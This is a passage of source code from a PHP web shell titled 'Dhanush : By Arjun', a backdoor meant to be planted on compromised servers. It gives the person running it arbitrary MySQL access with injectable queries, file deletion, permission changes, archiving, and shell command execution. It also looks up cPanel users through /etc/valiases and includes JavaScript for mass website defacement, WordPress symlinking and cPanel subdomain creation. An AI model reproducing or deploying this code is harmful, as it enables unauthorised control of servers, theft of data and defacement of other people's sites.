6300 $fieldname = $_GET['fieldname'];
6301 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6302 mysql_select_db($dbname);
6303 $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
6304 mysql_select_db( $dbname, $mysqlHandle );
6305 mysql_query( $queryStr , $mysqlHandle );
6306 listtable();
6307 }
6308
6309 if($_GET['action'] == 'viewdb')
6310 {
6311 listdatabase();
6312 }
6313
6314 // View Table Schema
6315 if($_GET['action'] == "viewSchema")
6316 {
6317 $dbserver = $_COOKIE["dbserver"];
6318 $dbuser = $_COOKIE["dbuser"];
6319 $dbpass = $_COOKIE["dbpass"];
6320 $dbname = $_GET['dbname'];
6321 $tablename = $_GET['tablename'];
6322 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6323 mysql_select_db($dbname);
6324 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
6325 $pResult = mysql_query( "SHOW fields FROM $tablename" );
6326 $num = mysql_num_rows( $pResult );
6327 echo "<br><br><table class=btmtbl align=center cellspacing=4 style='width:80%;' border=1>";
6328 echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
6329 for( $i = 0; $i < $num; $i++ )
6330 {
6331 $field = mysql_fetch_array( $pResult );
6332 echo "<tr>\n";
6333 echo "<td>".$field["Field"]."</td>\n";
6334 echo "<td>".$field["Type"]."</td>\n";
6335 echo "<td>".$field["Null"]."</td>\n";
6336 echo "<td>".$field["Key"]."</td>\n";
6337 echo "<td>".$field["Default"]."</td>\n";
6338 echo "<td>".$field["Extra"]."</td>\n";
6339 $fieldname = $field["Field"];
6340 echo "<td><a href=# onClick=\"viewtables('dropField','$dbname','$tablename','','','','$fieldname')\">Drop</a></td>\n";
6341 echo "</tr>\n";
6342 }
6343 echo "</table>";
6344 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
6345 }
6346
6347 // Execute Query
6348 if($_GET['action'] == "executequery")
6349 {
6350 $dbserver = $_COOKIE["dbserver"];
6351 $dbuser = $_COOKIE["dbuser"];
6352 $dbpass = $_COOKIE["dbpass"];
6353 $dbname = $_GET['dbname'];
6354 $tablename = $_GET['tablename'];
6355 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6356 mysql_select_db($dbname);
6357 $result = mysql_query($_GET['executemyquery']);
6358
6359 // results
6360 echo "<html>\r\n". strtoupper($_GET['executemyquery']) . "<br>\r\n<table border =\"1\">\r\n";
6361
6362 $count = 0;
6363 while ($row = mysql_fetch_assoc($result))
6364 {
6365 echo "<tr>\r\n";
6366
6367 if ($count==0) // list column names
6368 {
6369 echo "<tr>\r\n";
6370 while($key = key($row))
6371 {
6372 echo "<td><b>" . $key . "</b></td>\r\n";
6373 next($row);
6374 }
6375 echo "</tr>\r\n";
6376 }
6377
6378 foreach($row as $r) // list content of column names
6379 {
6380 if ($r=='') $r = '<font >NULL</font>';
6381 echo "<td><font class=txt>" . $r . "</font></td>\r\n";
6382 }
6383 echo "</tr>\r\n";
6384 $count++;
6385 }
6386 echo "</table>\n\r<font class=txt size=3>" . $count . " rows returned.</font>\r\n</html>";
6387 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
6388 }
6389
6390 // View Table Data
6391 if($_GET['action'] == "viewdata")
6392 {
6393 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
6394 $dbserver = $_COOKIE["dbserver"];
6395 $dbuser = $_COOKIE["dbuser"];
6396 $dbpass = $_COOKIE["dbpass"];
6397 $dbname = $_GET['dbname'];
6398 $tablename = $_GET['tablename'];
6399 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
6400 ?>
6401 <br><br>
6402 <form>
6403 <table>
6404 <tr>
6405 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
6406 </tr>
6407 <tr>
6408 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
6409 </tr>
6410 </table>
6411 </form>
6412 <?php
6413 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6414 mysql_select_db($dbname);
6415
6416 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6417 $row = mysql_fetch_array($sql);
6418 $rowid = $row['COLUMN_NAME'];
6419
6420 echo "<br><font size=4>Data in Table</font><br>";
6421 if( $tablename != "" )
6422 echo "<font size=3 class=txt>$dbname > $tablename</font><br>";
6423 else
6424 echo "<font size=3 class=txt>$dbname</font><br>";
6425
6426 $queryStr = "";
6427 $pag = 0;
6428 $queryStr = stripslashes( $queryStr );
6429 if( $queryStr == "" )
6430 {
6431 if(isset($_REQUEST['page']))
6432 {
6433 $res = mysql_query("select * from $tablename");
6434 $getres = mysql_num_rows($res);
6435 $coun = ceil($getres/30);
6436 if($_REQUEST['page'] != 1)
6437
6438 $pag = $_REQUEST['page'] * 30;
6439 else
6440 $pag = $_REQUEST['page'] * 30;
6441
6442 $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
6443 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
6444 $arrcount = 1;
6445 $arrdata[$arrcount] = 0;
6446 while($row = mysql_fetch_array($sql))
6447 {
6448 $arrdata[$arrcount] = $row[$rowid];
6449 $arrcount++;
6450 }
6451 }
6452 else
6453 {
6454 $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
6455 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
6456 $arrcount = 1;
6457 $arrdata[$arrcount] = 0;
6458 while($row = mysql_fetch_array($sql))
6459 {
6460 $arrdata[$arrcount] = $row[$rowid];
6461 $arrcount++;
6462 }
6463 }
6464 if( $orderby != "" )
6465 $queryStr .= " ORDER BY $orderby";
6466 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\"><font size=3>Schema</font></a>\n";
6467 }
6468
6469
6470 $pResult = mysql_query($queryStr );
6471 $fieldt = mysql_fetch_field($pResult);
6472 $tablename = $fieldt->table;
6473 $errMsg = mysql_error();
6474
6475 $GLOBALS[queryStr] = $queryStr;
6476
6477 if( $pResult == false )
6478 {
6479 echoQueryResult();
6480 return;
6481 }
6482 if( $pResult == 1 )
6483 {
6484 $errMsg = "Success";
6485 echoQueryResult();
6486 return;
6487 }
6488
6489 echo "<hr color='#1B1B1B'>\n";
6490
6491 $row = mysql_num_rows( $pResult );
6492 $col = mysql_num_fields( $pResult );
6493
6494 if( $row == 0 )
6495 {
6496 echo "<font size=3>No Data Exist!</font>";
6497 return;
6498 }
6499
6500 if( $rowperpage == "" ) $rowperpage = 30;
6501 if( $page == "" ) $page = 0;
6502 else $page--;
6503 mysql_data_seek( $pResult, $page * $rowperpage );
6504
6505 echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 align=center>\n";
6506 echo "<tr>\n";
6507 for( $i = 0; $i < $col; $i++ )
6508 {
6509 $field = mysql_fetch_field( $pResult, $i );
6510 echo "<th>";
6511 if($action == "viewdata")
6512 echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
6513 else
6514 echo $field->name."\n";
6515 echo "</th>\n";
6516 }
6517 echo "<th colspan=2>Action</th>\n";
6518 echo "</tr>\n";
6519 $num=1;
6520
6521
6522 $acount = 1;
6523
6524 for( $i = 0; $i < $rowperpage; $i++ )
6525 {
6526 $rowArray = mysql_fetch_row( $pResult );
6527 if( $rowArray == false ) break;
6528 echo "<tr>\n";
6529 $key = "";
6530 for( $j = 0; $j < $col; $j++ )
6531 {
6532 $data = $rowArray[$j];
6533
6534 $field = mysql_fetch_field( $pResult, $j );
6535 if( $field->primary_key == 1 )
6536 $key .= "&" . $field->name . "=" . $data;
6537
6538 if( strlen( $data ) > 30 )
6539 $data = substr( $data, 0, 30 ) . "...";
6540 $data = htmlspecialchars( $data );
6541 echo "<td>\n";
6542 echo "<font class=txt>$data</font>\n";
6543 echo "</td>\n";
6544 }
6545
6546 if(!is_numeric($arrdata[$acount]))
6547 echo "<td colspan=2>No Key</td>\n";
6548 else
6549 {
6550 echo "<td><a href=# onClick=\"viewtables('editData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Edit</a></td>\n";
6551 echo "<td><a href=# onClick=\"viewtables('deleteData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Delete</a></td>\n";
6552 $acount++;
6553 }
6554 }
6555 echo "</tr>\n";
6556
6557
6558 echo "</table>";
6559 if($arrcount > 30)
6560 {
6561 $res = mysql_query("select * from $tablename");
6562 $getres = mysql_num_rows($res);
6563 $coun = ceil($getres/30);
6564 echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
6565 for($i=0;$i<$coun;$i++)
6566 echo "<option value=$i>$i</option>";
6567
6568 echo "</select> <input type=button onClick=\"viewtables('viewdata','$dbname','$tablename','','','','',page.value)\" value=Go class=but></form>";
6569 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
6570 }
6571 }
6572
6573 // Delete Table Data
6574 if($_GET['action'] == "deleteData")
6575 {
6576 $dbserver = $_COOKIE["dbserver"];
6577 $dbuser = $_COOKIE["dbuser"];
6578 $dbpass = $_COOKIE["dbpass"];
6579 $dbname = $_GET['dbname'];
6580 $tablename = $_GET['tablename'];
6581 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6582 mysql_select_db($dbname);
6583 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6584 $row = mysql_fetch_array($sql);
6585 $row = $row['COLUMN_NAME'];
6586 $rowid = $_GET[$row];
6587 mysql_query("delete from $tablename where $row = '$rowid'");
6588 listtable();
6589 }
6590 // Edit Table Data
6591 if($_GET['action'] == "editData")
6592 {
6593 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
6594 $dbserver = $_COOKIE["dbserver"];
6595 $dbuser = $_COOKIE["dbuser"];
6596 $dbpass = $_COOKIE["dbpass"];
6597 $dbname = $_GET['dbname'];
6598 $tablename = $_GET['tablename'];
6599 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
6600 ?>
6601 <br><br>
6602 <form action="<?php echo $self; ?>" method="post">
6603 <?php
6604 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6605 mysql_select_db($dbname);
6606
6607 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6608 $row = mysql_fetch_array($sql);
6609 $row = $row['COLUMN_NAME'];
6610 $rowid = $_GET[$row];
6611
6612 $pResult = mysql_list_fields( $dbname, $tablename );
6613 $num = mysql_num_fields( $pResult );
6614
6615 $key = "";
6616 for( $i = 0; $i < $num; $i++ )
6617 {
6618 $field = mysql_fetch_field( $pResult, $i );
6619 if( $field->primary_key == 1 )
6620 if( $field->numeric == 1 )
6621 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
6622 else
6623 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
6624 }
6625 $key = substr( $key, 0, strlen($key)-4 );
6626
6627 mysql_select_db( $dbname, $mysqlHandle );
6628 $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
6629 $data = mysql_fetch_array( $pResult );
6630
6631 echo "<table class=btmtbl cellspacing=1 cellpadding=2 border=1>\n";
6632 echo "<tr>\n";
6633 echo "<th>Name</th>\n";
6634 echo "<th>Type</th>\n";
6635 echo "<th>Function</th>\n";
6636 echo "<th>Data</th>\n";
6637 echo "</tr>\n";
6638
6639 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6640 $num = mysql_num_rows( $pResult );
6641
6642 $pResultLen = mysql_list_fields( $dbname, $tablename );
6643 $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',";
6644 $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',";
6645 for( $i = 0; $i < $num; $i++ )
6646 {
6647 $field = mysql_fetch_array( $pResult );
6648 $fieldname = $field["Field"];
6649 $fieldtype = $field["Type"];
6650 $len = mysql_field_len( $pResultLen, $i );
6651
6652 echo "<tr>";
6653 echo "<td>$fieldname</td>";
6654 echo "<td>".$field["Type"]."</td>";
6655 echo "<td>\n";
6656 echo "<select name=${fieldname}_function class=sbox>\n";
6657 echo "<option>\n";
6658 echo "<option>ASCII\n";
6659 echo "<option>CHAR\n";
6660 echo "<option>SOUNDEX\n";
6661 echo "<option>CURDATE\n";
6662 echo "<option>CURTIME\n";
6663 echo "<option>FROM_DAYS\n";
6664 echo "<option>FROM_UNIXTIME\n";
6665 echo "<option>NOW\n";
6666 echo "<option>PASSWORD\n";
6667 echo "<option>PERIOD_ADD\n";
6668 echo "<option>PERIOD_DIFF\n";
6669 echo "<option>TO_DAYS\n";
6670 echo "<option>USER\n";
6671 echo "<option>WEEKDAY\n";
6672 echo "<option>RAND\n";
6673 echo "</select>\n";
6674 echo "</td>\n";
6675 $value = htmlspecialchars($data[$i]);
6676 $type = strtok( $fieldtype, " (,)\n" );
6677 if( $type == "enum" || $type == "set" )
6678 {
6679 echo "<td>\n";
6680 if( $type == "enum" )
6681 echo "<select name=$fieldname class=box>\n";
6682 else if( $type == "set" )
6683 echo "<select name=$fieldname size=4 class=box multiple>\n";
6684 while( $str = strtok( "'" ) )
6685 {
6686 if( $value == $str )
6687 echo "<option selected>$str\n";
6688 else
6689 echo "<option>$str\n";
6690 strtok( "'" );
6691 }
6692 echo "</select>\n";
6693 echo "</td>\n";
6694 }
6695 else
6696 {
6697 if( $len < 40 )
6698 echo "<td><input type=text size=40 maxlength=$len id=dhanush_$fieldname name=sql_$fieldname value=\"$value\" class=box></td>\n";
6699 else
6700 echo "<td><textarea cols=47 rows=3 maxlength=$len name=dhanush_$fieldname class=box>$value</textarea>\n";
6701 }
6702 $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
6703 $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
6704 echo "</tr>";
6705 }
6706 $fundata1=eregi_replace(',$', '', $fundata1);
6707 $fundata2=eregi_replace(',$', '', $fundata2);
6708
6709 echo "</table><p>\n";
6710 echo "<input type=button onClick=\"editdata($fundata1)\" value='Edit Data' class=but>\n";
6711 echo "<input type=button value='Insert' onClick=\"editdata($fundata2)\" class=but>\n";
6712 echo "</form>\n";
6713 }
6714 }
6715// Edit Submit Table Data
6716else if($_REQUEST['action'] == "editsubmitData")
6717{
6718 $dbserver = $_COOKIE["dbserver"];
6719 $dbuser = $_COOKIE["dbuser"];
6720 $dbpass = $_COOKIE["dbpass"];
6721 $dbname = $_POST['dbname'];
6722 $tablename = $_POST['tablename'];
6723
6724 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6725 mysql_select_db($dbname);
6726
6727 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6728 $row = mysql_fetch_array($sql);
6729 $row = $row['COLUMN_NAME'];
6730 $rowid = $_POST[$row];
6731
6732 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6733 $num = mysql_num_rows( $pResult );
6734
6735 $rowcount = $num;
6736
6737 $pResultLen = mysql_list_fields( $dbname, $tablename );
6738
6739 for( $i = 0; $i < $num; $i++ )
6740 {
6741 $field = mysql_fetch_array( $pResult );
6742 $fieldname = $field["Field"];
6743 $arrdata = $_REQUEST[$fieldname];
6744
6745 $str .= " " . $fieldname . " = '" . $arrdata . "'";
6746 $rowcount--;
6747 if($rowcount != 0)
6748 $str .= ",";
6749 }
6750
6751 $str = "update $tablename set" . $str . " where $row=$rowid";
6752 mysql_query($str);
6753 ?><div id="showsql"></div><?php
6754}
6755// Insert Table Data
6756else if($_REQUEST['action'] == "insertdata")
6757{
6758 $dbserver = $_COOKIE["dbserver"];
6759 $dbuser = $_COOKIE["dbuser"];
6760 $dbpass = $_COOKIE["dbpass"];
6761 $dbname = $_POST['dbname'];
6762 $tablename = $_POST['tablename'];
6763
6764 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6765 mysql_select_db($dbname);
6766
6767 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6768 $row = mysql_fetch_array($sql);
6769 $row = $row['COLUMN_NAME'];
6770 $rowid = $_POST[$row];
6771
6772 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6773 $num = mysql_num_rows( $pResult );
6774
6775 $rowcount = $num;
6776
6777 $pResultLen = mysql_list_fields( $dbname, $tablename );
6778
6779 for( $i = 0; $i < $num; $i++ )
6780 {
6781 $field = mysql_fetch_array( $pResult );
6782 $fieldname = $field["Field"];
6783 $arrdata = $_REQUEST[$fieldname];
6784
6785 $str1 .= "".$fieldname . ",";
6786 $str2 .= "'".$arrdata . "',";
6787 $rowcount--;
6788 if($rowcount != 0)
6789 {
6790 //$str1 .= $fieldname . ",";
6791 //$str2 .= $arrdata . ",";
6792 }
6793 }
6794 $str1=eregi_replace(',$', '', $str1);
6795 $str2=eregi_replace(',$', '', $str2);
6796 $str = "INSERT INTO `$tablename` ($str1) VALUES ($str2);";
6797 mysql_query($str);
6798
6799 ?><div id="showsql"></div><?php
6800}
6801else if(isset($_GET['logoutdb']))
6802{
6803 setcookie("dbserver",time() - 60*60);
6804 setcookie("dbuser",time() - 60*60);
6805 setcookie("dbpass",time() - 60*60);
6806 header("Location:$self");
6807}
6808else if(isset($_POST['choice']))
6809{
6810 if($_POST['choice'] == "delete")
6811 {
6812 $actbox = $_POST["actbox"];
6813 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6814
6815 foreach ($actbox as $myv)
6816 $myv = explode(",",$myv);
6817 foreach ($myv as $v)
6818 {
6819 if(is_file($v))
6820 {
6821 if(unlink($v))
6822 echo "<br><center><font class=txt>File $v Deleted Successfully</font></center>";
6823 else
6824 echo "<br><center>Cannot Delete File $v</center>";
6825 }
6826 else if(is_dir($v))
6827 {
6828 rrmdir($v);
6829 }
6830 }
6831 echo '<br>';
6832 }
6833 else if($_POST['choice'] == "chmod")
6834 { ?>
6835 <BR><form id="chform"><?php
6836 $actbox1 = $_POST['actbox'];
6837 foreach ($actbox1 as $myv)
6838 $myv = explode(",",$myv);
6839 foreach ($myv as $v)
6840 { ?>
6841 <input type="hidden" name="actbox3[]" id="actbox3[]" value="<?php echo $v; ?>">
6842 <?php }
6843 ?>
6844 <table align="center" border="3" style="width:40%; border-color:#333333;">
6845 <tr>
6846 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
6847 </tr>
6848 <tr>
6849 <td colspan="2" align="center" style="height:60px">
6850 <input type="button" onClick="myaction('changefileperms',chmode.value)" value="Change Permission" class="but" style="padding: 5px;" />
6851 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" /></form></center>
6852 </td>
6853 </tr>
6854 </table>
6855
6856 </form> <?php
6857 }
6858 else if($_POST['choice'] == "changefileperms")
6859 {
6860 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6861 if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
6862 {
6863 $actbox = $_POST["actbox"];
6864 foreach ($actbox as $myv)
6865 $myv = explode(",",$myv);
6866 foreach ($myv as $v)
6867 {
6868 if(is_file($v) || is_dir($v))
6869 {
6870 $perms = 0;
6871 for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
6872 $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
6873 echo "<div align=left style=width:80%;>";
6874 if(@chmod($v,$perms))
6875 echo "<font class=txt>File $v Permissions Changed Successfully</font><br>";
6876 else
6877 echo "Cannot Change $v File Permissions<br>";
6878 echo "</div>";
6879 }
6880 }
6881
6882 }
6883 }
6884 else if($_POST['choice'] == "compre")
6885 {
6886 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6887 $actbox = $_POST["actbox"];
6888 foreach ($actbox as $myv)
6889 $myv = explode(",",$myv);
6890 foreach ($myv as $v)
6891 {
6892 if(is_file($v))
6893 {
6894 $zip = new ZipArchive();
6895 $filename= basename($v) . '.zip';
6896 if(($zip->open($filename, ZipArchive::CREATE))!==true)
6897 { echo '<br><font size=3>Error: Unable to create zip file for $v</font>';}
6898 else {echo "<br><font class=txt size=3>File $v Compressed successfully</font>";}
6899 $zip->addFile(basename($v));
6900 $zip->close();
6901 }
6902 else if(is_dir($v))
6903 {
6904 if($os == "Linux")
6905 {
6906 $filename= basename($v);
6907 execmd("tar --create --recursion --file=$filename.tar $v");
6908 echo "<br><font class=txt size=3>File $v Compressed successfully as $v.tar</font>";
6909 }
6910 else
6911 echo "<BR>Cannot compress directory<BR><BR>";
6912 }
6913 }
6914 echo '<BR><BR>';
6915 }
6916 else if($_POST['choice'] == "uncompre")
6917 {
6918 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6919 $actbox = $_POST["actbox"];
6920 foreach ($actbox as $myv)
6921 $myv = explode(",",$myv);
6922 foreach ($myv as $v)
6923 {
6924 if(is_file($v) || is_dir($v))
6925 {
6926 $zip = new ZipArchive;
6927 $filename= basename($v);
6928 $res = $zip->open($filename);
6929 if ($res === TRUE)
6930 {
6931 $pieces = explode(".",$filename);
6932 $zip->extractTo($pieces[0]);
6933 $zip->close();
6934 echo '<BR><font class=txt size=3>File '.$v.' Unzipped successfully</font>';
6935 } else
6936 echo "<br><font size=3>Error: Unable to Unzip file $v</font>";
6937 }
6938 }
6939 echo '<BR><BR>';
6940 }
6941}
6942else if(isset($_GET['sitename']))
6943{
6944 $sitename = str_replace("http://","",$_GET['sitename']);
6945 $sitename = str_replace("http://www.","",$sitename);
6946 $sitename = str_replace("www.","",$sitename);
6947 $show = myexe("ls -la /etc/valiases/".$sitename);
6948 if(!empty($show))
6949 echo $show;
6950 else
6951 echo "Cannot get the username";
6952}
6953else if(isset($_GET['mydata']))
6954{
6955 listdatabase();
6956}
6957else if(isset($_GET['home']))
6958{
6959 mainfun($_GET['home']);
6960}
6961else if(isset($_GET['dir']))
6962{
6963 mainfun($_GET['myfilepath']);
6964}
6965else if(isset($_GET['mydirpath']))
6966{
6967 echo is_writable($_GET['mydirpath'])?"<font class=txt>< writable ></font>":"< not writable >";
6968}
6969else
6970{
6971?>
6972<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
6973<title>Dhanush : By Arjun</title>
6974<script type="text/javascript">
6975checked = false;
6976var waitstate = "<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
6977function checkedAll ()
6978{
6979 if (checked == false){checked = true}else{checked = false}
6980 for (var i = 0; i < document.getElementById('myform').elements.length; i++)
6981 {
6982 document.getElementById('myform').elements[i].checked = checked;
6983 }
6984}
6985function change_style(mystyle)
6986{
6987 window.location.href = '<?php echo $self; ?>?style='+mystyle;
6988}
6989function createsubdomain(cpaneluser,cpanelpass,noofsubdomain,subindex)
6990{
6991 var params = "cpaneluser="+cpaneluser+"&cpanelpass="+cpanelpass+"&noofsubdomain="+noofsubdomain+"&subindex="+subindex;
6992 document.getElementById("showmydata").innerHTML=waitstate;
6993 var ajaxRequest;
6994 ajaxRequest = new XMLHttpRequest();
6995
6996 ajaxRequest.onreadystatechange = function()
6997 {
6998 if(ajaxRequest.readyState == 3)
6999 {
7000 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
7001 }
7002 }
7003
7004 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7005 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7006 ajaxRequest.send(params);
7007}
7008function massdeface(script,masswpdef,wpsym)
7009{
7010 var params = "massscript="+script+"&massdef="+masswpdef+"&wpsym="+wpsym;
7011 document.getElementById("showdef").innerHTML="<center><marquee scrollamount=4 width=150>It may take long time. Wait....</marquee></center>";
7012 var ajaxRequest;
7013 ajaxRequest = new XMLHttpRequest();
7014
7015 ajaxRequest.onreadystatechange = function()
7016 {
7017 if(ajaxRequest.readyState == 3)
7018 {
7019 document.getElementById("showdef").innerHTML=ajaxRequest.responseText;
7020 }
7021 }
7022
7023 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7024 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7025 ajaxRequest.send(params);
7026}
7027function urlchange(myfilepath)
7028{
7029 var mypath, mpath, i, t, j, r = "",myurl = "",splitter="";
7030 splitter = "<?php echo addslashes($directorysperator); ?>";
7031 mypath = mpath = myfilepath.split(splitter);
7032 <?php if($os == "Linux") { ?>
7033 r = "/";
7034 myurl = "<a href=javascript:void(0) onClick=\"changedir('dir','/')\">/</a>";
7035 <?php } ?>
7036 for (i = 0; i < mypath.length; i++)
7037 {
7038 if(mypath[i] == "")
7039 continue;
7040 r += mypath[i]+"<?php echo addslashes($directorysperator); ?>";
7041
7042 myurl += "<a href=javascript:void(0) onClick=\"changedir('dir','"+r+"\')\"><b>"+mypath[i]+"<?php echo addslashes($directorysperator); ?></b></a>";
7043 }
7044 myurl = myurl.replace(/\\/g,"\\\\");
7045 return myurl;
7046}
7047function wrtblDIR(mydirpath)
7048{
7049 var ajaxRequest;
7050 ajaxRequest = new XMLHttpRequest();
7051
7052 ajaxRequest.onreadystatechange = function()
7053 {
7054 if(ajaxRequest.readyState == 4)
7055 {
7056 for(i=0;i<=3;i++)
7057 document.getElementsByName("wrtble")[i].innerHTML=ajaxRequest.responseText;
7058 }
7059 }
7060
7061 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydirpath="+mydirpath, true);
7062 ajaxRequest.send(null);
7063}
7064function setpath(myfilpath)
7065{
7066 wrtblDIR(myfilpath);
7067 document.getElementById("path").value=myfilpath;
7068 document.getElementById("createfile").value=myfilpath;
7069 document.getElementById("readfile").value=myfilpath;
7070 document.getElementById("readdir").value=myfilpath;
7071 document.getElementById("createfolder").value=myfilpath;
7072 document.getElementById("createfolder").value=myfilpath;
7073 document.getElementById("exepath").value=myfilpath;
7074 document.getElementById("auexepath").value=myfilpath;
7075 document.getElementById("showdir").innerHTML="";
7076}
7077function changedir(myaction,myfilepath)
7078{
7079 var myurl = urlchange(myfilepath);
7080
7081 document.getElementById("showmaindata").innerHTML=waitstate;
7082 var ajaxRequest;
7083 ajaxRequest = new XMLHttpRequest();
7084
7085 ajaxRequest.onreadystatechange = function()
7086 {
7087 if(ajaxRequest.readyState == 4)
7088 {
7089 setpath(myfilepath);
7090 document.getElementById("crdir").innerHTML=myurl;
7091 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
7092 }
7093 }
7094
7095 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
7096 ajaxRequest.send(null);
7097}
7098function gethome(myaction,mydir)
7099{
7100 var myurl = urlchange(mydir);
